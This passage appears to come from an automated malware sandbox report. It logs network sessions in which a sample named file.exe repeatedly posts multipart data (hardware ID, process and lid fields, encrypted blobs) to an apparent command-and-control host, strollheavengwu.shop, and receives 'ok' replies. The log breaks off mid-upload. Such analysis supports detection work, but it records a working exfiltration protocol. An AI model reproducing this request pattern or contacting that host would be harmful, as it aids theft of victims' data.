2024-04-20 19:08:00 UTC	1369	IN	Data Raw: 44 4e 65 35 77 64 6f 35 63 31 61 42 64 6c 42 42 2b 54 52 5a 6b 51 35 6b 31 74 6f 46 39 59 67 39 43 78 65 73 6b 68 34 39 69 44 78 34 34 5a 2f 67 48 68 2b 56 39 2f 66 77 42 76 48 39 6f 68 73 69 50 6b 43 6e 76 79 41 78 76 44 2b 4c 4e 67 31 79 72 68 32 59 50 41 77 48 2b 65 47 71 4f 59 50 32 38 53 5a 77 56 55 31 43 6a 32 63 61 42 48 4e 61 35 76 63 61 69 77 76 58 53 63 65 72 47 65 71 4d 6a 42 65 74 56 32 78 49 35 36 44 6e 78 79 62 44 53 32 62 66 56 33 35 68 49 33 6f 41 41 53 79 2f 36 35 61 74 63 75 2f 39 2b 4e 7a 63 74 35 6b 68 47 6f 6d 44 4e 6d 45 58 6b 44 55 74 51 74 2b 58 4b 73 54 6e 54 72 52 31 53 72 6d 39 45 73 32 7a 71 7a 68 73 61 4c 2f 48 61 44 44 71 7a 52 58 41 30 49 4a 57 38 33 74 6a 53 61 45 4d 30 4b 63 75 78 48 51 6f 47 77 74 33 37 64 4a 2b 48 61 69 Data Ascii: DNe5wdo5c1aBdlBB+TRZkQ5k1toF9Yg9Cxeskh49iDx44Z/gHh+V9/fwBvH9ohsiPkCnvyAxvD+LNg1yrh2YPAwH+eGqOYP28SZwVU1Cj2caBHNa5vcaiwvXScerGeqMjBetV2xI56DnxybDS2bfV35hI3oAASy/65atcu/9+Nzct5khGomDNmEXkDUtQt+XKsTnTrR1Srm9Es2zqzhsaL/HaDDqzRXA0IJW83tjSaEM0KcuxHQoGwt37dJ+Hai
2024-04-20 19:08:00 UTC	1369	IN	Data Raw: 5a 45 61 79 65 4e 32 55 57 59 52 5a 4e 30 53 54 36 66 71 70 42 65 2b 59 56 48 4d 7a 35 75 57 2f 56 4a 66 76 53 6a 73 6a 4a 4d 64 74 32 78 50 70 30 59 51 38 72 58 42 32 64 44 75 56 72 71 77 6f 64 69 78 68 55 71 35 75 6a 42 4c 64 4a 73 39 6d 49 69 35 59 7a 31 52 61 69 6d 54 35 69 45 47 59 44 57 64 51 2f 2b 33 36 6f 53 6e 48 72 43 42 7a 48 38 37 70 2b 32 69 62 37 33 59 6e 47 77 48 4b 52 58 75 48 35 58 77 31 58 62 42 77 66 68 57 2b 79 53 61 74 45 62 75 38 41 43 38 6d 77 30 67 66 44 62 4a 75 31 6e 61 4f 6c 47 74 55 5a 6f 39 46 73 4a 46 64 76 43 6b 33 57 4c 50 6c 77 71 45 31 36 35 51 30 61 7a 50 53 35 59 74 63 6a 38 4e 61 4a 78 73 42 37 6e 42 65 6f 6e 54 42 68 56 79 56 73 4e 4c 5a 74 39 57 50 6d 45 6a 65 67 4c 44 76 75 33 4c 31 32 6e 45 71 59 77 63 71 6a 70 57 Data Ascii: ZEayeN2UWYRZN0ST6fqpBe+YVHMz5uW/VJfvSjsjJMdt2xPp0YQ8rXB2dDuVrqwodixhUq5ujBLdJs9mIi5Yz1RaimT5iEGYDWdQ/+36oSnHrCBzH87p+2ib73YnGwHKRXuH5Xw1XbBwfhW+ySatEbu8AC8mw0gfDbJu1naOlGtUZo9FsJFdvCk3WLPlwqE165Q0azPS5Ytcj8NaJxsB7nBeonTBhVyVsNLZt9WPmEjegLDvu3L12nEqYwcqjpW
2024-04-20 19:08:00 UTC	1369	IN	Data Raw: 6b 69 4a 72 42 79 74 73 4e 4d 4a 6a 6d 68 43 2f 49 68 36 4c 52 78 33 50 73 4f 49 75 6e 43 54 36 32 49 50 4e 77 47 4f 51 47 4b 43 65 50 57 38 54 59 77 64 66 32 53 6e 31 66 71 56 47 66 75 63 45 46 63 66 35 74 47 58 54 59 72 32 32 37 36 43 4f 64 6f 31 65 39 39 4e 30 52 77 78 6f 43 46 4b 64 52 5a 6c 6b 36 43 49 65 2b 57 39 78 71 4c 43 39 59 4a 78 36 73 5a 36 49 78 63 74 78 6e 78 69 72 6c 44 4a 73 45 6d 73 50 58 4e 49 70 39 48 2b 70 53 6e 37 70 42 68 7a 47 2b 72 46 71 30 53 48 31 32 4d 53 46 70 68 72 2b 58 71 69 4a 64 44 35 56 4b 79 52 45 30 43 48 31 4f 38 34 68 61 71 35 76 63 64 71 59 30 51 65 63 4a 66 2b 65 33 49 6d 4f 65 70 6b 61 71 4a 45 35 5a 52 39 75 41 46 58 59 4c 66 70 70 72 6b 70 79 38 68 55 61 79 76 57 32 62 39 77 6d 39 64 65 43 79 4d 6f 78 32 33 62 Data Ascii: kiJrBytsNMJjmhC/Ih6LRx3PsOIunCT62IPNwGOQGKCePW8TYwdf2Sn1fqVGfucEFcf5tGXTYr2276COdo1e99N0RwxoCFKdRZlk6CIe+W9xqLC9YJx6sZ6IxctxnxirlDJsEmsPXNIp9H+pSn7pBhzG+rFq0SH12MSFphr+XqiJdD5VKyRE0CH1O84haq5vcdqY0QecJf+e3ImOepkaqJE5ZR9uAFXYLfpprkpy8hUayvW2b9wm9deCyMox23b
2024-04-20 19:08:00 UTC	1369	IN	Data Raw: 67 38 72 58 42 32 64 47 50 46 31 71 45 31 6a 38 55 6f 39 7a 66 65 37 65 73 77 31 2f 4a 37 4b 6f 36 55 61 31 52 6a 76 79 58 59 31 57 51 4e 76 4e 4a 30 70 34 7a 76 2b 43 43 57 79 58 45 2b 51 70 2b 6f 2b 74 45 6e 73 6b 4f 79 67 31 78 6e 2b 64 65 2b 48 64 44 35 56 4f 55 6f 33 74 6b 61 79 61 65 59 53 4e 36 42 41 47 64 48 69 76 47 2f 4b 49 62 54 67 75 75 7a 59 65 35 49 4f 71 49 59 37 4a 6c 6b 44 62 7a 53 64 49 72 49 6a 35 48 4d 64 69 32 78 78 67 2f 6d 39 64 38 30 30 2f 73 36 44 69 36 59 61 2f 69 48 68 2b 56 38 4e 56 33 4e 45 42 35 39 74 78 33 69 6f 52 48 4c 32 46 6c 66 6b 35 72 42 72 7a 43 58 6b 30 63 53 46 70 68 72 2b 58 71 6e 52 62 43 52 45 4a 57 77 30 74 6d 33 32 61 75 59 53 4e 37 42 56 51 5a 61 6a 37 54 79 4f 53 70 6a 42 79 71 4f 6c 61 50 31 31 78 4e 45 69 Data Ascii: g8rXB2dGPF1qE1j8Uo9zfe7esw1/J7Ko6Ua1RjvyXY1WQNvNJ0p4zv+CCWyXE+Qp+o+tEnskOyg1xn+de+HdD5VOUo3tkayaeYSN6BAGdHivG/KIbTguuzYe5IOqIY7JlkDbzSdIrIj5HMdi2xxg/m9d800/s6Di6Ya/iHh+V8NV3NEB59tx3ioRHL2Flfk5rBrzCXk0cSFphr+XqnRbCREJWw0tm32auYSN7BVQZaj7TyOSpjByqOlaP11xNEi
2024-04-20 19:08:00 UTC	1369	IN	Data Raw: 5a 6d 6e 53 37 67 61 65 6c 62 59 2b 30 58 48 59 2f 34 71 32 48 51 59 72 32 63 78 49 66 4b 65 70 6b 62 71 49 46 37 64 41 64 67 43 45 6d 52 4b 65 41 37 36 41 67 31 38 51 77 56 30 66 36 39 49 38 30 30 2f 73 36 48 7a 73 6b 39 6e 51 2b 69 6e 58 51 6f 56 53 73 52 56 4e 45 72 2f 32 37 70 57 32 50 6a 45 52 32 50 2b 4b 74 68 30 47 4c 4d 6b 4f 79 67 70 54 47 4e 58 76 66 54 64 46 4d 55 5a 51 70 59 79 7a 79 2f 57 36 31 47 64 75 77 47 48 59 4f 2b 30 67 65 33 59 76 57 65 33 49 6d 64 50 2f 31 31 78 4e 45 77 64 31 63 7a 52 67 2b 50 64 71 63 6f 38 52 6f 6e 69 47 77 46 6a 5a 6a 52 64 62 52 4a 6d 4a 36 53 69 35 59 7a 78 31 44 48 2b 6c 38 6d 42 53 74 63 48 5a 31 71 38 57 6d 30 54 48 62 32 42 46 33 39 7a 72 74 68 30 32 37 39 31 59 54 4d 33 6d 65 4f 55 71 65 53 4c 6e 77 70 56 Data Ascii: ZmnS7gaelbY+0XHY/4q2HQYr2cxIfKepkbqIF7dAdgCEmRKeA76Ag18QwV0f69I800/s6Hzsk9nQ+inXQoVSsRVNEr/27pW2PjER2P+Kth0GLMkOygpTGNXvfTdFMUZQpYyzy/W61GduwGHYO+0ge3YvWe3ImdP/11xNEwd1czRg+Pdqco8RoniGwFjZjRdbRJmJ6Si5Yzx1DH+l8mBStcHZ1q8Wm0THb2BF39zrth02791YTM3meOUqeSLnwpV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.15.198	443	4192	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 19:08:00 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18161 Host: strollheavengwu.shop
2024-04-20 19:08:00 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 33 41 35 46 39 41 37 42 31 42 33 45 39 35 44 32 44 42 41 30 33 43 38 36 33 44 35 41 33 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E53A5F9A7B1B3E95D2DBA03C863D5A3F--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-04-20 19:08:00 UTC	2830	OUT	Data Raw: 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f Data Ascii: 2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?
2024-04-20 19:08:01 UTC	812	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 19:08:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=um22ri64di95k8badkq1ebnj1u; expires=Wed, 14-Aug-2024 12:54:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ml%2Bpp5yThd4EOiQHZkM48iDFmAPLeiSwdhOgTutxGc0NdNT2QwoDcexTLvYkUx60EXJMGpXQoRfzk7dO5eguMOuTM%2Fu%2FapQRUUsktG2xNB3N3wuFC8%2BdqMe0DtxsHUtQ4s2gtm5%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87776ba7a8857bd8-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 19:08:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a Data Ascii: fok 81.181.57.52
2024-04-20 19:08:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	104.21.15.198	443	4192	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 19:08:01 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8782 Host: strollheavengwu.shop
2024-04-20 19:08:01 UTC	8782	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 33 41 35 46 39 41 37 42 31 42 33 45 39 35 44 32 44 42 41 30 33 43 38 36 33 44 35 41 33 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E53A5F9A7B1B3E95D2DBA03C863D5A3F--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-04-20 19:08:01 UTC	818	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 19:08:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sf459g7s67l8b8thg4185ut4lg; expires=Wed, 14-Aug-2024 12:54:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BOiHX1KyBFg3ESw0qrskX3gVIaUSZ50XQ2Us2tM25grDJdi4idyR6YHkt%2B0mcyTYc2ZN%2BrnDm%2BnIJ%2BWixfRJ1PL819Hw7ceiuyXaU%2Fw5tOSsRR97ZhnJ3ctRSycWrPoMW4fWd%2BKd%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87776bacfd716736-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 19:08:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a Data Ascii: fok 81.181.57.52
2024-04-20 19:08:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	104.21.15.198	443	4192	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 19:08:02 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20435 Host: strollheavengwu.shop
2024-04-20 19:08:02 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 33 41 35 46 39 41 37 42 31 42 33 45 39 35 44 32 44 42 41 30 33 43 38 36 33 44 35 41 33 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E53A5F9A7B1B3E95D2DBA03C863D5A3F--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-04-20 19:08:02 UTC	5104	OUT	Data Raw: 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-04-20 19:08:02 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 19:08:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7amffjvr4ntjskfe75t2vkhge2; expires=Wed, 14-Aug-2024 12:54:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=94oRMw0sfbRz6Pf1v6L0MWu%2B0NIfDrxYEpoGXnHO0XadKlnzgE6PqgGlpCGXFUu40Nax5wbp0Tev8nQVQC4WxhLtDA2M0TELCt8PIURiv8PrJYK%2FpkSMSWOHiaHjKxClCGKGja4a8A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87776bb2fbba44ee-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 19:08:02 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a Data Ascii: fok 81.181.57.52
2024-04-20 19:08:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	104.21.15.198	443	4192	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 19:08:03 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5448 Host: strollheavengwu.shop
2024-04-20 19:08:03 UTC	5448	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 33 41 35 46 39 41 37 42 31 42 33 45 39 35 44 32 44 42 41 30 33 43 38 36 33 44 35 41 33 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E53A5F9A7B1B3E95D2DBA03C863D5A3F--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-04-20 19:08:03 UTC	802	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 19:08:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mc4icb4die11icgodc2pv1vtro; expires=Wed, 14-Aug-2024 12:54:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Npy38u40HinaqlQHScOdiqKAMpOdxmACezgizrh6PnkiQG5W5hXkGklzbcxCPdGh2vuEz5ecFpZQY3kSdkPdyiSkFGE4f1Qp0ONd1HVhDukbdugXkVBme9gw2zBNnXOpx3Yd4RprFw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87776bb95a7f6761-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 19:08:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a Data Ascii: fok 81.181.57.52
2024-04-20 19:08:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	104.21.15.198	443	4192	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 19:08:04 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1398 Host: strollheavengwu.shop
2024-04-20 19:08:04 UTC	1398	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 33 41 35 46 39 41 37 42 31 42 33 45 39 35 44 32 44 42 41 30 33 43 38 36 33 44 35 41 33 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E53A5F9A7B1B3E95D2DBA03C863D5A3F--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-04-20 19:08:04 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 19:08:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vkcpbe5f2eqije8d6ufnm8k54i; expires=Wed, 14-Aug-2024 12:54:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxfmDEPiipQtDEgVMKu8TK2nyZCyHEswKMazLCSm%2BydE3yqafFHxr%2BTXb2JYHDAZKx3PpV7J8Dxyj6Oargbbnabtl7mNQgg0V6v5s7bhuBzaBCt9l1GPPJwj8pQmxW2CfmHASlj5lg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87776bbe9b3f78ce-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 19:08:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a Data Ascii: fok 81.181.57.52
2024-04-20 19:08:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	104.21.15.198	443	4192	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 19:08:05 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 573232 Host: strollheavengwu.shop
